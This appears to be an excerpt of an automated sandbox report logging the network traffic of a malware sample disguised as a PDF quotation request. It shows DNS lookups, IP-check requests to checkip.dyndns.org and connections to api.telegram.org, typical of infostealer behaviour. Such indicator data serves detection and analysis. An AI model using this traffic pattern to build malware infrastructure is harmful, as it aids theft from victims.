                                                                                                                                Dec 16, 2024 08:45:21.678369999 CET49913443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:21.678807974 CET49913443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:21.707403898 CET4990880192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:45:21.827652931 CET8049908158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:21.827779055 CET4990880192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:45:21.846673965 CET4991980192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:45:21.966526985 CET8049919158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:21.966674089 CET4991980192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:45:21.966839075 CET4991980192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:45:22.086602926 CET8049919158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:23.179970026 CET8049919158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:23.181512117 CET49924443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:23.181531906 CET44349924149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:23.181632042 CET49924443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:23.181931973 CET49924443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:23.181941986 CET44349924149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:23.229605913 CET4991980192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:45:24.569710970 CET44349924149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:24.571741104 CET49924443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:24.571755886 CET44349924149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:24.571837902 CET49924443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:24.571844101 CET44349924149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:25.312876940 CET44349924149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:25.313067913 CET44349924149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:25.313230038 CET49924443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:25.313555956 CET49924443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:25.337879896 CET4991980192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:45:25.457979918 CET8049919158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:25.458090067 CET4991980192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:45:25.477793932 CET4993080192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:25.597757101 CET8049930193.122.130.0192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:25.597860098 CET4993080192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:25.598035097 CET4993080192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:25.717741013 CET8049930193.122.130.0192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:26.695615053 CET8049930193.122.130.0192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:26.696955919 CET49932443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:26.697009087 CET44349932149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:26.697092056 CET49932443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:26.697387934 CET49932443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:26.697407961 CET44349932149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:26.745176077 CET4993080192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:28.060112000 CET44349932149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:28.062165976 CET49932443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:28.062227964 CET44349932149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:28.062311888 CET49932443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:28.062335968 CET44349932149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:28.684781075 CET44349932149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:28.684870005 CET44349932149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:28.684957981 CET49932443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:28.685431957 CET49932443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:28.711520910 CET4993080192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:28.712681055 CET4993880192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:28.831475019 CET8049930193.122.130.0192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:28.831556082 CET4993080192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:28.832323074 CET8049938193.122.130.0192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:28.832406044 CET4993880192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:28.832575083 CET4993880192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:28.952158928 CET8049938193.122.130.0192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:29.936479092 CET8049938193.122.130.0192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:29.937726021 CET49943443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:29.937774897 CET44349943149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:29.937843084 CET49943443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:29.938112020 CET49943443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:29.938132048 CET44349943149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:29.979733944 CET4993880192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:31.305027962 CET44349943149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:31.306907892 CET49943443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:31.306941032 CET44349943149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:31.306991100 CET49943443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:31.307002068 CET44349943149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:31.974596977 CET44349943149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:31.974669933 CET44349943149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:31.974771023 CET49943443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:31.975294113 CET49943443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:32.001379013 CET4993880192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:32.002604961 CET4994980192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:32.121721029 CET8049938193.122.130.0192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:32.121795893 CET4993880192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:32.122293949 CET8049949193.122.130.0192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:32.122387886 CET4994980192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:32.122556925 CET4994980192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:32.242238045 CET8049949193.122.130.0192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:34.158066988 CET8049949193.122.130.0192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:34.159477949 CET49955443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:34.159503937 CET44349955149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:34.159599066 CET49955443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:34.159979105 CET49955443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:34.159995079 CET44349955149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:34.198327065 CET4994980192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:35.568854094 CET44349955149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:35.571228981 CET49955443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:35.571244955 CET44349955149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:35.571306944 CET49955443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:35.571316004 CET44349955149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:36.359317064 CET44349955149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:36.359394073 CET44349955149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:36.359436035 CET49955443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:36.360017061 CET49955443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:36.389847040 CET4994980192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:36.391038895 CET4996180192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:36.510045052 CET8049949193.122.130.0192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:36.510253906 CET4994980192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:36.510854959 CET8049961193.122.130.0192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:36.510984898 CET4996180192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:36.511266947 CET4996180192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:36.631098032 CET8049961193.122.130.0192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:37.608104944 CET8049961193.122.130.0192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:37.609271049 CET49963443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:37.609322071 CET44349963149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:37.609407902 CET49963443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:37.609699011 CET49963443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:37.609729052 CET44349963149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:37.651527882 CET4996180192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:38.988599062 CET44349963149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:38.990716934 CET49963443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:38.990742922 CET44349963149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:38.990812063 CET49963443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:38.990823030 CET44349963149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:39.676471949 CET44349963149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:39.676654100 CET44349963149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:39.676963091 CET49963443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:39.677161932 CET49963443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:39.711726904 CET4996180192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:39.712874889 CET4996980192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:39.831820965 CET8049961193.122.130.0192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:39.832354069 CET4996180192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:39.832556009 CET8049969193.122.130.0192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:39.832647085 CET4996980192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:39.832798004 CET4996980192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:39.952444077 CET8049969193.122.130.0192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:41.929605007 CET8049969193.122.130.0192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:41.979615927 CET4996980192.168.2.5193.122.130.0
                                                                                                                                Dec 16, 2024 08:45:43.294691086 CET49979443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:43.294718027 CET44349979149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:43.294787884 CET49979443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:43.295155048 CET49979443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:43.295170069 CET44349979149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:44.718249083 CET44349979149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:44.760890961 CET49979443192.168.2.5149.154.167.220
                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Dec 16, 2024 08:44:31.831710100 CET6201653192.168.2.51.1.1.1
                                                                                                                                Dec 16, 2024 08:44:31.969788074 CET53620161.1.1.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:34.617038012 CET6480153192.168.2.51.1.1.1
                                                                                                                                Dec 16, 2024 08:44:34.754390001 CET53648011.1.1.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:40.209338903 CET5098153192.168.2.51.1.1.1
                                                                                                                                Dec 16, 2024 08:44:40.347033978 CET53509811.1.1.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:42.281481981 CET5128053192.168.2.51.1.1.1
                                                                                                                                Dec 16, 2024 08:44:42.421469927 CET53512801.1.1.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:50.111534119 CET6011353192.168.2.51.1.1.1
                                                                                                                                Dec 16, 2024 08:44:50.249928951 CET53601131.1.1.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:21.708029985 CET6479253192.168.2.51.1.1.1
                                                                                                                                Dec 16, 2024 08:45:21.845316887 CET53647921.1.1.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:25.338399887 CET5536453192.168.2.51.1.1.1
                                                                                                                                Dec 16, 2024 08:45:25.476124048 CET53553641.1.1.1192.168.2.5
                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                Dec 16, 2024 08:44:31.831710100 CET192.168.2.51.1.1.10xd0f1Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:44:34.617038012 CET192.168.2.51.1.1.10x34f8Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:44:40.209338903 CET192.168.2.51.1.1.10x15daStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:44:42.281481981 CET192.168.2.51.1.1.10xfd42Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:44:50.111534119 CET192.168.2.51.1.1.10xc95cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:45:21.708029985 CET192.168.2.51.1.1.10x9dc7Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:45:25.338399887 CET192.168.2.51.1.1.10xc269Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                Dec 16, 2024 08:44:31.969788074 CET1.1.1.1192.168.2.50xd0f1No error (0)drive.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:44:34.754390001 CET1.1.1.1192.168.2.50x34f8No error (0)drive.usercontent.google.com142.250.181.1A (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:44:40.347033978 CET1.1.1.1192.168.2.50x15daNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:44:40.347033978 CET1.1.1.1192.168.2.50x15daNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:44:40.347033978 CET1.1.1.1192.168.2.50x15daNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:44:40.347033978 CET1.1.1.1192.168.2.50x15daNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:44:40.347033978 CET1.1.1.1192.168.2.50x15daNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:44:40.347033978 CET1.1.1.1192.168.2.50x15daNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:44:42.421469927 CET1.1.1.1192.168.2.50xfd42No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:44:42.421469927 CET1.1.1.1192.168.2.50xfd42No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:44:50.249928951 CET1.1.1.1192.168.2.50xc95cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:45:21.845316887 CET1.1.1.1192.168.2.50x9dc7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:45:21.845316887 CET1.1.1.1192.168.2.50x9dc7No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:45:21.845316887 CET1.1.1.1192.168.2.50x9dc7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:45:21.845316887 CET1.1.1.1192.168.2.50x9dc7No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:45:21.845316887 CET1.1.1.1192.168.2.50x9dc7No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:45:21.845316887 CET1.1.1.1192.168.2.50x9dc7No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:45:25.476124048 CET1.1.1.1192.168.2.50xc269No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:45:25.476124048 CET1.1.1.1192.168.2.50xc269No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:45:25.476124048 CET1.1.1.1192.168.2.50xc269No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:45:25.476124048 CET1.1.1.1192.168.2.50xc269No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:45:25.476124048 CET1.1.1.1192.168.2.50xc269No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                Dec 16, 2024 08:45:25.476124048 CET1.1.1.1192.168.2.50xc269No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                • drive.google.com
                                                                                                                                • drive.usercontent.google.com
                                                                                                                                • reallyfreegeoip.org
                                                                                                                                • api.telegram.org
                                                                                                                                • checkip.dyndns.org
                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.549812158.101.44.24280616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 16, 2024 08:44:40.474033117 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 16, 2024 08:44:41.679105997 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 16 Dec 2024 07:44:41 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 1d9ebfb391616416dc46c0a0778fae27
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                Dec 16, 2024 08:44:41.683551073 CET127OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Dec 16, 2024 08:44:42.057377100 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 16 Dec 2024 07:44:41 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: e1d57d8629cb8f98de470a1981d64662
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                Dec 16, 2024 08:44:49.734045029 CET127OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Dec 16, 2024 08:44:50.107709885 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 16 Dec 2024 07:44:49 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: b5edfc16cdb354535026832a55efa609
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.549844158.101.44.24280616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 16, 2024 08:44:52.934993982 CET127OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Dec 16, 2024 08:44:54.144963980 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 16 Dec 2024 07:44:53 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: b99684083ec15b3027b2831a2f8a3ce2
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                2192.168.2.549852158.101.44.24280616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 16, 2024 08:44:56.300303936 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 16, 2024 08:44:57.522845984 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 16 Dec 2024 07:44:57 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 4b99d3dcf74a5f93bb19a25011382008
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                3192.168.2.549862158.101.44.24280616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 16, 2024 08:44:59.758994102 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 16, 2024 08:45:02.519011021 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 16 Dec 2024 07:45:02 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: afc6f44e34e76ab6fcddabd014737090
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                4192.168.2.549875158.101.44.24280616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 16, 2024 08:45:04.671096087 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 16, 2024 08:45:16.278702021 CET321INHTTP/1.1 200 OK
